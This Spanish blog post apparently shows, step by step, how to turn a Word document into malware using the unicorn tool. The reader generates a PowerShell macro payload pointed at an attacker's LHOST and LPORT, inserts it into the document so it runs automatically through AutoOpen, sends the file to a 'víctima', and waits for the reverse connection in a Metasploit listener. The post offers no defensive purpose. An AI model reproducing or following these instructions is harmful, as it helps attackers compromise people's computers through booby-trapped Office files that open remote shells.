viernes, 27 de mayo de 2016

Infectado un documento de word

Descargamos unicorn desde https://github.com/trustedsec/unicorn



Descomprimimos en una carpeta, la que queramos.



con ./unicorn.py vemos la ayuda



Creamos el payload

./unicorn.py payload_a_crear_ LHOST LPORT macro





nos ha creado el archivo powershell_attack.txt donde estará el macro del payload.



vista → macro → ver macro







Añadimos el nombre de nuestra macro



crear



copiamos el codigo



Borramos la parte de arriba y cambiamos sub Auto_open() por sub AutoOpen()



Si queremos, podemos borrar las líneas señaladas



Yo las voy a borrar



Guardamos la macro, y lo pasamos a la víctima

Ejecutamos el listener

msfconsole -r unicorn.rc



En cuanto abra el archivo





No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.